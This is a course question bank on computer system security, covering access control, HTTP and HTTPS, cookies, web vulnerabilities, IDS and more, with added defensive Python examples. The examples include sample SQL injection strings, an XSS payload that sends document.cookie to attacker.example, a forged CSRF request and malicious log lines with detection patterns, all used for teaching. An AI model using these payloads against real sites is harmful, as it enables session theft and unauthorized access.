
Mangalmay Institute of Engineering & Technology, Gr. Noida
Question Bank
Unit No: 2 and 3
Course Name & Code: Computer System Security (KNC-301)
Faculty Name: Shweta Chauhan

1. What is access control mechanism? Explain its types. (2019, 2020, 2021)

Access control is a security technique that regulates who or what can view or use resources in a computing environment. A subject (a user, process or device) is allowed to perform an operation on an object (a file, database record, service or room) only when the access policy permits it. It is a fundamental concept in security that minimizes risk to the business or organization.

There are two types of access control: physical and logical. Physical access control limits access to campuses, buildings, rooms and physical IT assets. Logical access control limits connections to computer networks, system files and data.

To secure a facility, organizations use electronic access control systems that rely on user credentials, access card readers, auditing and reports to track employee access to restricted business locations and proprietary areas, such as data centers. Some of these systems incorporate access control panels to restrict entry to rooms and buildings, as well as alarms and lockdown capabilities to prevent unauthorized access or operations. Logical access control works the same way in software: every request is checked against the policy (the policy models are described in question 11) and the decision is logged so that it can be audited.

2. What are web security and its goals? (2020, 2021)

Web security is the part of cyber security that deals with websites, web applications and web services. It basically means protecting a website or web application by detecting, preventing and responding to cyber threats. Its goals are the general security goals applied to the web: confidentiality of the data the site handles, integrity of its content and transactions, availability of the service, and accountability, so that actions performed through the site can be traced to an authenticated user.

Websites and web applications are just as prone to security breaches as physical homes, stores and government locations. Cybercrime happens every day, and good web security measures are needed to protect websites and web applications from being compromised.

That is exactly what web security does: it is a system of protection measures and protocols that protect a website or web application from being hacked or entered by unauthorized people. This division of information security is vital to the protection of websites, web applications and web services. Anything that is exposed over the Internet should have some form of web security to protect it.

3. Explain threat modeling. (2020, 2021)

With the advancement in technology it becomes easier every day for an attacker to gain access to sensitive data, disable applications and so on. Application security has therefore become a major concern. One method used to build security into the design process is threat modeling.

A threat is anything that can take advantage of a vulnerability to breach security and negatively alter, erase or harm an object of interest. Threat modeling can be done at any stage of development, but if it is done at the beginning it helps to identify threats early, when they can still be dealt with cheaply by changing the design.

The purpose of threat modeling is to identify, communicate and understand threats and their mitigations to the organization's stakeholders as early as possible. Documentation from this process provides system analysts and defenders with an analysis of the probable attacker profiles, the most likely attack vectors and the assets the attacker most desires. In practice this means drawing the system's components, trust boundaries and data flows, listing for each element what could go wrong, rating the threats and deciding on a mitigation for each.

4. Write a short note on HTTP and HTTPS. (2018, 2019, 2020, 2021)

HTTP stands for Hypertext Transfer Protocol. When you enter http:// in the address bar in front of the domain, it tells the browser to connect over HTTP. HTTP uses TCP (Transmission Control Protocol), generally over port 80, to send and receive data over the web. Put simply, it is the request/response protocol used between a client and a server that lets a browser talk to websites. After the TCP handshake the client sends a request message to the HTTP server that hosts the website, and the server replies with a response message. The response message contains a status line (for example 200 OK or 301 Moved Permanently), headers and the requested content. Everything in an HTTP exchange is sent in plaintext, so anyone on the network path can read it or modify it.

HTTPS stands for Hypertext Transfer Protocol Secure. When you enter https:// in the address bar in front of the domain, it tells the browser to connect over HTTPS. Generally, sites running over HTTPS will have a redirect in place so that even if you type http:// the browser is redirected to the secured connection. HTTPS also uses TCP to send and receive data, but it does so over port 443, within a connection encrypted by Transport Layer Security (TLS). TLS gives the exchange confidentiality and integrity, and the server's certificate lets the browser authenticate which site it is talking to; the HTTP messages themselves are unchanged, they are simply carried inside the TLS connection.
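The request/response exchange and the http:// to https:// redirect described above, as an added example that is not part of the original question bank. It builds a raw HTTP/1.1 request, parses a raw response, checks that a reply to a plain-HTTP request is a redirect to https:// on the same host, and shows how the same TCP connection is wrapped in TLS with certificate verification. The sample response bytes and the host name example.com are constructed for the example; tls_connect is defined but not called here, so nothing goes over the network.

```python
# Added example (not from the question bank): raw HTTP/1.1 request and response
# handling, the http:// -> https:// redirect check, and TLS wrapping of the TCP socket.
import socket
import ssl
from urllib.parse import urlsplit


def build_request(host: str, path: str = "/") -> bytes:
    """Serialize the GET request the client sends once the TCP handshake is done."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}", "Connection: close", "", ""]
    return "\r\n".join(lines).encode("ascii")


def parse_response(raw: bytes):
    """Split a raw response into (status_code, headers, body).

    Header names are lower-cased so lookups are case-insensitive, as HTTP requires.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    parts = status_line.split(" ", 2)               # "HTTP/1.1 200 OK" (reason is optional)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError("not an HTTP response")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(parts[1]), headers, body


def redirects_to_https(raw: bytes, host: str) -> bool:
    """True if this reply to an http:// request sends the client to https:// on the same host.

    Anything else (a 200 over plain HTTP, or a redirect to another host) means the
    plaintext channel is still in use and the site is not enforcing HTTPS.
    """
    code, headers, _ = parse_response(raw)
    if code not in (301, 302, 307, 308):
        return False
    target = urlsplit(headers.get("location", ""))
    return target.scheme == "https" and target.hostname == host


def tls_connect(host: str, port: int = 443) -> ssl.SSLSocket:
    """Open the TCP connection and wrap it in TLS.

    create_default_context() verifies the server certificate chain against the
    system trust store and checks that the certificate matches server_hostname;
    without both checks HTTPS gives encryption but not authentication.
    """
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    sock = socket.create_connection((host, port))
    return ctx.wrap_socket(sock, server_hostname=host)


# Constructed sample replies (not captured from any real server).
PLAIN_OK = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>hello</html>"
REDIRECT_TO_HTTPS = (
    b"HTTP/1.1 301 Moved Permanently\r\n"
    b"Location: https://example.com/\r\n"
    b"Strict-Transport-Security: max-age=31536000\r\n\r\n"
)
```

The redirect check is what a browser relies on when the user types http://; the Strict-Transport-Security header in the sample reply is what makes the browser skip the plaintext request altogether on later visits.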

5. What are cookies? (2019)

Cookies are small pieces of data which a web server asks the browser to store on the user's computer (with the Set-Cookie response header) and which the browser sends back on later requests to the same site (in the Cookie request header). They are designed to hold a modest amount of data specific to a particular client and website, and can be accessed either by the web server or by the client computer. This allows the server to deliver a page tailored to a particular user, or the page itself can contain a script which is aware of the data in the cookie and so is able to carry information from one visit to the website (or a related site) to the next. Because the session identifier that keeps a user logged in is usually stored in a cookie, the attributes set on the cookie (Secure, HttpOnly, SameSite, Domain and Path) decide whether it can be stolen over plain HTTP, read by injected script, or sent along with forged cross-site requests.
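A Set-Cookie parser and an audit of the attributes that protect a session cookie, as an added example that is not part of the original question bank. The two sample headers are constructed; the served_over_https flag is an assumption about the site being checked.

```python
# Added example (not from the question bank): parse a Set-Cookie header and audit the
# attributes that protect a session cookie.  The sample headers are constructed.


def parse_set_cookie(header: str) -> dict:
    """Parse one Set-Cookie value into {'name', 'value', 'attrs'}.

    Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to True.
    """
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_session_cookie(header: str, served_over_https: bool = True) -> list:
    """Return the weaknesses found in a session cookie (empty list when it is set properly).

    served_over_https is an assumption about the site; the checks themselves follow
    what each attribute controls in the browser.
    """
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    findings = []
    if served_over_https and attrs.get("secure") is not True:
        findings.append("missing Secure: the browser will also send it over plain HTTP")
    if attrs.get("httponly") is not True:
        findings.append("missing HttpOnly: readable from script, so XSS can steal it")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: attached to cross-site requests (CSRF)")
    if "domain" in attrs:
        findings.append("Domain set: cookie is shared with every subdomain of " + str(attrs["domain"]))
    if cookie["name"].startswith("__Host-"):
        # Browsers only accept a __Host- cookie when these conditions hold.
        if attrs.get("secure") is not True or "domain" in attrs or attrs.get("path") != "/":
            findings.append("__Host- prefix requires Secure, Path=/ and no Domain")
    return findings


# Constructed sample headers.
WEAK_COOKIE = "sessionid=abc123; Path=/"
GOOD_COOKIE = "__Host-sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"
```

Run audit_session_cookie on the Set-Cookie header of a login response: the weak header above produces three findings, the hardened one none.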
6. What are frames? (2020)

In networking, a frame is the unit of data at the data-link layer: it wraps a packet with a header (addresses, type) and a trailer (a checksum) so that the receiver can tell where one unit ends and the next begins and can detect corruption. Frames help to identify data packets in networking and telecommunication systems and determine how a receiver interprets a stream of bits from a source. In the browser context the same word refers to HTML frames (the frame and iframe elements), which embed one document inside another; when the embedded document comes from a different origin, the browser's same-origin policy keeps the two documents' scripts and data apart.
7. Explain the security development of a website. (2019, 2020, 2021)

The Internet is a dangerous place! With great regularity we hear about websites becoming unavailable due to denial of service attacks, or displaying modified (and often damaging) information on their home pages. In other high-profile cases, millions of passwords, email addresses and credit card details have been leaked into the public domain, exposing website users to both personal embarrassment and financial risk. Developing a website securely therefore means building security into the design and the code rather than adding it afterwards: treat every input from the client as untrusted and validate it, encode output for the context it is placed in, serve the site over HTTPS, protect sessions and credentials, apply least privilege to the accounts and components the site runs with, and keep the platform, frameworks and libraries patched. The vulnerability classes in the next question are the ones that most often appear when these steps are skipped.
8. Explain the types of vulnerabilities related to the web. (2020, 2021)

1. SQL INJECTION

SQL injection is a type of web application security vulnerability in which an attacker supplies input that the application pastes into the text of an SQL query, so that the input is interpreted as part of the query rather than as data. If successful, this allows the attacker to read, create, update or delete data the application was never meant to expose, and sometimes to run commands on the database server. The defence is to keep data and code apart by using parameterized queries (prepared statements), so that user input can never change the structure of the query.
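The injectable and the parameterized form of the same login query, as an added example that is not part of the original question bank. It runs against an in-memory SQLite database built in the block; the user rows, passwords and payloads are constructed for the example (a real system stores password hashes, but the injection point is the same).

```python
# Added example (not from the question bank): the same login lookup written with string
# concatenation (injectable) and with a parameterized query (safe), run against an
# in-memory SQLite database built here.  Rows and passwords are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    # User input becomes part of the SQL text, so a quote in it changes the query.
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return db.execute(query).fetchone() is not None


def login_parameterized(db: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders: the values travel separately from the statement and are only
    # ever compared as strings, so they cannot become SQL.
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


# Two classic payloads.  The first turns the WHERE clause into "... OR '1'='1",
# the second comments out the password check entirely.
PAYLOAD_TAUTOLOGY = "' OR '1'='1"
PAYLOAD_COMMENT = "alice'--"
```

With the password field set to PAYLOAD_TAUTOLOGY the vulnerable query becomes `... AND password = '' OR '1'='1'`, which is true for every row, so the login succeeds without a password; the parameterized version compares the literal string and fails.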

2. CROSS-SITE SCRIPTING (XSS)

Cross-site scripting (XSS) targets an application's users by injecting code, usually a client-side script such as JavaScript, into a web application's output. The concept of XSS is to get the application to place attacker-controlled text into a page in such a way that the browser executes it as script on behalf of the attacker. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions (for example by reading a session cookie that is not HttpOnly), deface websites or redirect the user to malicious sites. The defence is to encode untrusted data for the context in which it is placed in the page (HTML body, attribute, JavaScript, URL), to prefer templating engines that escape by default, and to add a Content Security Policy as a second layer.
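A user comment rendered into a page without encoding and with HTML encoding, plus a small parser that reports which elements and event handlers the browser would actually see, as an added example that is not part of the original question bank. The payload and the attacker.example host are constructed.

```python
# Added example (not from the question bank): rendering a user comment into a page
# without encoding (vulnerable) and with HTML encoding (safe), and a small parser that
# shows which elements and event handlers the browser would actually see.
import html
from html.parser import HTMLParser


def render_vulnerable(comment: str) -> str:
    # The comment is pasted straight into the markup: tags inside it become real tags.
    return f'<p class="comment">{comment}</p>'


def render_encoded(comment: str) -> str:
    # html.escape turns < > & " ' into entities, so the browser shows the text as text.
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attribute(value: str) -> str:
    # Attribute context: the value must be quoted AND quote-escaped, otherwise
    # "><img ...> would break out of the attribute and start a new element.
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


class _Inspector(HTMLParser):
    """Records every start tag and every on* event-handler attribute the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def what_the_browser_sees(markup: str) -> dict:
    """Return the elements and event handlers that would be live in the rendered page."""
    p = _Inspector()
    p.feed(markup)
    p.close()
    return {"tags": p.tags, "handlers": p.handlers}


# Constructed payload: no <script> tag needed, an event handler on an image is enough.
PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
```

The inspector is the point of the example: after encoding, the markup still contains the attacker's text, but the parser (and therefore the browser) finds only the original paragraph element and no event handler.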

3. BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Broken authentication and session management encompass several security issues, all of them having to do with maintaining the identity of a user. If authentication credentials and session identifiers are not protected at all times, an attacker can hijack an active session and assume the identity of a user. Typical causes are session identifiers carried in URLs, predictable or long-lived session identifiers, sessions that are not invalidated on logout or after a password change, passwords stored without hashing, and credentials or session cookies sent over plain HTTP.

4. INSECURE DIRECT OBJECT REFERENCES

An insecure direct object reference occurs when a web application exposes a reference to an internal implementation object, such as a file name, database record, directory or database key, and uses that reference without checking that the requesting user is allowed to access the object. When such a reference appears in a URL or form field, an attacker can change it (for example by incrementing an id) to reach another user's data. The fix is an authorization check on every access, binding the object to the authenticated user, or replacing direct keys with per-user indirect references.
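An invoice lookup keyed by the id in the URL, first without any ownership check, then bound to the logged-in user, and finally through per-user indirect references, as an added example that is not part of the original question bank. The invoice table, user names and the Forbidden exception are constructed for the example.

```python
# Added example (not from the question bank): an invoice lookup keyed by the id in the
# URL, first without any ownership check, then bound to the logged-in user, and finally
# through per-user indirect references so the database key never appears in the URL.
import secrets

INVOICES = {
    101: {"owner": "alice", "amount": 120},
    102: {"owner": "bob", "amount": 75},
}


class Forbidden(Exception):
    pass


def get_invoice_vulnerable(current_user: str, invoice_id: int) -> dict:
    # The reference from the URL is used directly: any logged-in user can read any id.
    return INVOICES[invoice_id]


def get_invoice_checked(current_user: str, invoice_id: int) -> dict:
    record = INVOICES.get(invoice_id)
    # One response for "does not exist" and "not yours", so ids cannot be probed.
    if record is None or record["owner"] != current_user:
        raise Forbidden("no such invoice")
    return record


def issue_references(current_user: str) -> dict:
    """Per-user map of random tokens to the ids this user may access (kept server-side,
    for example in the session).  Only the tokens go into links and forms."""
    return {secrets.token_urlsafe(8): iid
            for iid, rec in INVOICES.items() if rec["owner"] == current_user}


def get_invoice_by_reference(ref_map: dict, token: str) -> dict:
    if token not in ref_map:
        raise Forbidden("no such invoice")
    return INVOICES[ref_map[token]]


def denied(func, *args) -> bool:
    """Helper for the checks below: True when the call is refused."""
    try:
        func(*args)
    except Forbidden:
        return True
    return False
```

The checked version is the one to use by default; indirect references are worth the extra bookkeeping when the keys themselves (sequential invoice numbers, user ids) should not be visible at all.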

5. SECURITY MISCONFIGURATION

Security misconfiguration encompasses several types of vulnerabilities, all centered on a lack of maintenance or a lack of attention to the web application's configuration. A secure configuration must be defined and deployed for the application, the frameworks, the application server, the web server, the database server and the platform, and kept current with patches. Common examples are default accounts and passwords, directory listing and debug modes left enabled, verbose error messages that reveal stack traces, and unused features or sample applications left installed. Security misconfiguration gives attackers access to private data or functionality and can result in a complete system compromise.

6. CROSS-SITE REQUEST FORGERY (CSRF)

Cross-site request forgery (CSRF) is an attack in which a user is tricked into performing an action he or she did not intend to perform. A third-party website causes the victim's browser to send a request to a web application that the user is already authenticated against (for example their bank); because the browser attaches the session cookie automatically, the application cannot tell the forged request from a genuine one and performs the action with the victim's privileges. Targets include web applications like social media, in-browser email clients and online banking. Defences are an unpredictable anti-forgery token tied to the session and checked on every state-changing request, SameSite cookies, and checking the Origin or Referer header.
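A transfer endpoint that trusts the session cookie alone next to one that also requires a session-bound anti-forgery token and checks the Origin header, as an added example that is not part of the original question bank. Requests are plain dicts standing in for a framework's request object; the site origin bank.example, the session table and the server key are constructed for the example.

```python
# Added example (not from the question bank): a money-transfer endpoint that trusts the
# session cookie alone (forgeable) next to one that also requires a session-bound
# anti-forgery token and checks the Origin header.
import hashlib
import hmac
import secrets

SITE_ORIGIN = "https://bank.example"
SERVER_KEY = secrets.token_bytes(32)      # in practice a deployment secret, not generated per run
SESSIONS = {"s1": "alice"}                # session id -> user (constructed)


def csrf_token(session_id: str) -> str:
    """Derive the token from the session id with HMAC: unguessable, useless in any
    other session, and nothing extra to store server-side."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted: str) -> bool:
    # compare_digest is constant-time, so the token cannot be recovered byte by byte.
    return hmac.compare_digest(csrf_token(session_id), submitted or "")


def transfer_vulnerable(request: dict) -> str:
    # Only the cookie is checked, and the browser attaches cookies to cross-site
    # form posts automatically: a hidden auto-submitting form on evil.example succeeds.
    if request["cookies"].get("session") not in SESSIONS:
        return "401 not logged in"
    return "transfer done"


def transfer_protected(request: dict) -> str:
    sid = request["cookies"].get("session")
    if sid not in SESSIONS:
        return "401 not logged in"
    origin = request["headers"].get("origin")
    # Browsers send Origin on cross-site POSTs; when present it must be our own site.
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-site request"
    if not verify_csrf(sid, request["form"].get("csrf_token")):
        return "403 bad csrf token"
    return "transfer done"


# Constructed requests: one forged from another site, one from the bank's own form.
FORGED = {"cookies": {"session": "s1"},
          "headers": {"origin": "https://evil.example"},
          "form": {"to": "mallory", "amount": "1000"}}
LEGIT = {"cookies": {"session": "s1"},
         "headers": {"origin": SITE_ORIGIN},
         "form": {"to": "bob", "amount": "10", "csrf_token": csrf_token("s1")}}
```

The token check is the one that matters: the forging site cannot read the token out of the bank's page (same-origin policy), so it cannot include it in the forged form, while the Origin check is a cheap first line that also catches requests from sites that strip the header.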

9. What are the characteristics and features of UNIX? (2020, 2021)

Features of UNIX:
1. Portable: UNIX is written mostly in C and can be installed on many hardware platforms.
2. Multi-user: UNIX allows multiple users to share the same system concurrently, each with their own account, files and permissions.
3. Multi-tasking: UNIX allows a user to run more than one program at a time.
4. Organized file system: UNIX has a hierarchical file and directory system that allows users to organize and maintain files.
5. Device independence: UNIX treats input/output devices as ordinary files. The destination of a program's input and output is easily controlled through a UNIX design feature called redirection.
6. Utilities: UNIX provides a rich library of utilities.
7. Security: every file and process has an owner, and access is governed by permissions and user identities, which is the basis of the privilege model discussed in questions 18 and 19.
10. Explain browser isolation in detail. (2019, 2020, 2021)

1. Browser isolation is a cyber security model for web browsing that physically separates an internet user's browsing activity from their local machine, network and infrastructure.
2. With this model, individual browser sessions are abstracted away from the hardware and from direct internet access, trapping harmful activity inside a disposable environment.
3. Browser isolation may also be referred to as remote browser isolation, web isolation or remote browsing.
4. A major weakness of popular security tools is protection from web or browser-based attacks, malware and ransomware.
5. By separating browsing activity from the endpoint hardware, the device's attack surface is reduced, sensitive data is protected and malware or other known and unknown security threats are minimised.
6. This is an evolution of the security concepts of physical isolation and air-gapping.

Working of browser isolation:
• Browser isolation works by providing users with a disposable, non-persistent environment for browsing. The web page is fetched and rendered in a container or virtual machine on a remote host (or in a sandbox on the endpoint); only a safe representation of the rendered page (pixels or a sanitised document) is delivered to the user's real browser, and the environment is destroyed at the end of the session, so any malware that ran inside it is discarded with it.
11. What are the different types of access control? (2019, 2020, 2021)

The main models of access control are the following:

Mandatory access control (MAC). This is a security model in which access rights are regulated by a central authority based on multiple levels of security. Often used in government and military environments, classifications (labels) are assigned to system resources and enforced by the operating system or security kernel. MAC grants or denies access to resource objects based on the information security clearance of the user or device, and neither the owner of a resource nor the user can override the policy. For example, Security-Enhanced Linux (SELinux) is an implementation of MAC on Linux.

Discretionary access control (DAC). This is an access control method in which owners or administrators of the protected system, data or resource set the policies defining who or what is authorized to access the resource. Many of these systems enable administrators to limit the propagation of access rights. A common criticism of DAC systems is a lack of centralized control: an owner (or malware running as the owner) can grant access to anyone. Standard UNIX file permissions are an example of DAC.

Role-based access control (RBAC). This is a widely used access control mechanism that restricts access to computer resources based on individuals or groups with defined business functions (for example executive level, engineer level 1) rather than the identities of individual users. Permissions are attached to roles and users are assigned to roles; the role-based security model relies on a structure of role assignments, role authorizations and role permissions developed using role engineering to regulate employee access to systems. RBAC systems can be used to enforce MAC and DAC frameworks.

Rule-based access control. This is a security model in which the system administrator defines the rules that govern access to resource objects. These rules are often based on conditions such as time of day or location. It is not uncommon to use some form of both rule-based access control and RBAC to enforce access policies and procedures.

Attribute-based access control (ABAC). This is a methodology that manages access rights by evaluating a set of rules, policies and relationships using the attributes of users, resources and environmental conditions (for example the user's department, the document's classification and the time of the request).
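One small policy engine that evaluates the same request under each model listed above (DAC, MAC, RBAC, rule-based and ABAC), as an added example that is not part of the original question bank. The users, clearances, roles, labels, ACL and the working-hours rule are all constructed for the example, and the MAC rules used are the Bell-LaPadula ones (no read up, no write down).

```python
# Added example (not from the question bank): one small policy engine that evaluates a
# request under each access-control model, so the differences show on the same data.
from dataclasses import dataclass, field

LEVELS = {"public": 0, "confidential": 1, "secret": 2}   # MAC classification lattice


@dataclass
class Subject:
    name: str
    clearance: str                              # MAC: label assigned by the authority
    roles: set = field(default_factory=set)     # RBAC: business functions
    department: str = ""                        # ABAC: an attribute of the user


@dataclass
class Resource:
    name: str
    owner: str                                  # DAC: the owner decides
    classification: str                         # MAC: label on the object
    acl: dict = field(default_factory=dict)     # DAC: user -> set of operations
    department: str = ""                        # ABAC: an attribute of the object


ROLE_PERMS = {"engineer": {"read"}, "lead": {"read", "write"}, "auditor": {"read"}}


def dac_permits(s: Subject, r: Resource, op: str) -> bool:
    # Discretionary: the owner always may, others only if the owner put them on the ACL.
    return s.name == r.owner or op in r.acl.get(s.name, set())


def mac_permits(s: Subject, r: Resource, op: str) -> bool:
    # Mandatory (Bell-LaPadula): no read up, no write down; ownership is irrelevant.
    subject_level, object_level = LEVELS[s.clearance], LEVELS[r.classification]
    return object_level <= subject_level if op == "read" else object_level >= subject_level


def rbac_permits(s: Subject, r: Resource, op: str) -> bool:
    # Role-based: permissions hang off roles, users hold roles.
    return any(op in ROLE_PERMS.get(role, set()) for role in s.roles)


def rule_permits(op: str, hour: int) -> bool:
    # Rule-based: an administrator-defined condition on the environment (time of day).
    return op == "read" or 9 <= hour < 18


def abac_permits(s: Subject, r: Resource, op: str, hour: int) -> bool:
    # Attribute-based: combine subject, object and environment attributes in one policy.
    return s.department == r.department and rule_permits(op, hour)


def authorize(s: Subject, r: Resource, op: str, hour: int = 12,
              models=("mac", "rbac", "abac")) -> bool:
    """Grant only if every selected model permits; combining them this way means a
    discretionary or role grant can never override the mandatory label check."""
    checks = {
        "dac": lambda: dac_permits(s, r, op),
        "mac": lambda: mac_permits(s, r, op),
        "rbac": lambda: rbac_permits(s, r, op),
        "rule": lambda: rule_permits(op, hour),
        "abac": lambda: abac_permits(s, r, op, hour),
    }
    return all(checks[m]() for m in models)


# Constructed data: alice owns a document that is classified above her clearance.
ALICE = Subject("alice", clearance="confidential", roles={"engineer"}, department="eng")
BOB = Subject("bob", clearance="secret", roles={"lead"}, department="eng")
DESIGN_DOC = Resource("design.doc", owner="alice", classification="secret",
                      acl={"bob": {"read"}}, department="eng")
```

The case worth noticing is alice reading her own document: DAC says yes (she owns it), MAC says no (secret is above her clearance), and the combined decision follows MAC, which is exactly the property that distinguishes mandatory from discretionary control.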

12. What do you understand by security policies?

A security policy is a written document in an organization outlining how to protect the organization from threats, including computer security threats, and how to handle situations when they do occur. A security policy must identify all of a company's assets as well as all the potential threats to those assets, and state who is responsible for what and which controls are required.

Data security is commonly described in terms of the confidentiality, integrity and availability of data. Companies must also ensure data privacy, because the information is an asset to the company. A data security policy is simply the means to the desired end, which is data privacy.

13. What is a rootkit attack?

A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or to an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software. A rootkit attack installs such software after a system has been compromised, for example by replacing system utilities or loading a kernel module that hides the attacker's files, processes and network connections from the administrator's tools, so that the attacker keeps privileged access undetected.

14. What is virtualization-based isolation?

The popularity and widespread adoption of cloud computing has resulted in extensive and intensive use of virtualization technology. Virtualization technology allows the sharing of the same physical resources among several users. This enables the consolidation of servers and a multitude of user machines into a very small set of physical servers, by replacing the physical machines with virtual machines running on the same physical servers. Consequently, several users work on and store their data in the same physical platform. A software layer, the hypervisor, is used to enable the sharing of hardware between the different users and to keep each virtual machine within its own memory, CPU state and virtual devices. Understandably, this leads to apprehension about the security of the users' data and working environment, as these are situated only one software layer apart from those belonging to the other users: the isolation is only as strong as the hypervisor, so a bug in it can let one tenant read or tamper with another's virtual machine.

15.Explain IDS?
An Intrusion Detection System (IDS) is a system that monitors network traffic
for suspicious activity and issues alerts when such activity is discovered. It is a
software application that scans a network or a system for harmful activity or policy
breaching. Any malicious venture or violation is normally reported either to an
administrator or collected centrally using a security information and event
management (SIEM) system. A SIEM system integrates outputs from multiple
sources and uses alarm filtering techniques to differentiate malicious activity from
false alarms.
16. Discuss the types of intrusion detection system.

Classification of Intrusion Detection System:

IDS are classified into 5 types:

Network Intrusion Detection System (NIDS):

Network intrusion detection systems (NIDS) are set up at a planned point within the network to examine traffic from all devices on the network. A NIDS observes the traffic passing on the entire subnet and matches it against a collection of known attack signatures (and, in anomaly-based systems, against a baseline of normal behaviour). Once an attack is identified or abnormal behavior is observed, an alert can be sent to the administrator. An example of a NIDS deployment is installing it on the subnet where the firewalls are located in order to see whether someone is trying to get through the firewall.
Host Intrusion Detection System (HIDS):

Host intrusion detection systems (HIDS) run on individual hosts or devices on the network. A HIDS monitors the incoming and outgoing packets of that device only, together with its logs and processes, and alerts the administrator if suspicious or malicious activity is detected. It takes a snapshot of the existing system files and compares it with the previous snapshot; if critical system files were modified or deleted, an alert is sent to the administrator to investigate. An example of HIDS usage can be seen on mission-critical machines, which are not expected to change their layout.
Protocol-based Intrusion Detection System (PIDS):

A protocol-based intrusion detection system (PIDS) is a system or agent that resides at the front end of a server, monitoring and interpreting the protocol between a user or device and the server. For a web server it watches the HTTP(S) stream and checks that the requests conform to what the protocol and the application expect. Because HTTPS is encrypted on the wire, the PIDS has to sit at the point where the stream has already been decrypted, between the TLS endpoint and the web presentation layer, otherwise it would see only ciphertext.

Application Protocol-based Intrusion Detection System (APIDS):

An application protocol-based intrusion detection system (APIDS) is a system or agent that generally resides within a group of servers. It identifies intrusions by monitoring and interpreting the communication on application-specific protocols. For example, it would monitor the SQL protocol used between the middleware and the database as the web server transacts with it, and raise an alert on queries that do not match the application's normal pattern.
Hybrid Intrusion Detection System:

A hybrid intrusion detection system is made by combining two or more approaches to intrusion detection. In a hybrid intrusion detection system, host agent or system data is combined with network information to develop a complete view of the network system. A hybrid intrusion detection system is more effective than the individual approaches on their own. Prelude is an example of a hybrid IDS.
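The two detection techniques from questions 15 and 16 in miniature, as an added example that is not part of the original question bank: a signature-based detector run over web-server log lines (the NIDS idea, with the request decoded before matching so URL-encoding does not evade the rules) and a file-integrity check that compares hashed snapshots (the HIDS idea). The log lines, file contents and the three rules are all constructed for the example.

```python
# Added example (not from the question bank): a signature-based detector over constructed
# web-server log lines (NIDS idea) and a hashed-snapshot file-integrity check (HIDS idea).
import hashlib
import re
from urllib.parse import unquote

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*"')

# Deliberately small rule set; a real NIDS has thousands of rules plus protocol decoders.
SIGNATURES = {
    "sql-injection": re.compile(r"(?i)'\s*(or|and)\b|union\s+select|'--"),
    "xss": re.compile(r"(?i)<script|onerror\s*="),
    "path-traversal": re.compile(r"\.\./"),
}


def scan_log(lines) -> list:
    """Return one finding per (line, rule) match: {'ip', 'rule', 'path'}."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _method, path = m.groups()
        decoded = unquote(path)                      # normalise before matching
        for rule, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                findings.append({"ip": ip, "rule": rule, "path": decoded})
    return findings


def snapshot(files: dict) -> dict:
    """Hash every file's contents (path -> bytes here; a real HIDS reads them from disk)."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def compare_snapshots(baseline: dict, current: dict) -> dict:
    """Report files whose hash changed, files that vanished and files that appeared."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "deleted": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


# Constructed web-server log lines (the last one hides the traversal behind %2F).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /login?user=admin%27--&pass=x HTTP/1.1" 200 220',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 310',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /static/..%2F..%2Fetc/passwd HTTP/1.1" 404 0',
]

# Constructed file contents for the integrity check.
BASELINE_FILES = {"/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
                  "/bin/ls": b"\x7fELF-original",
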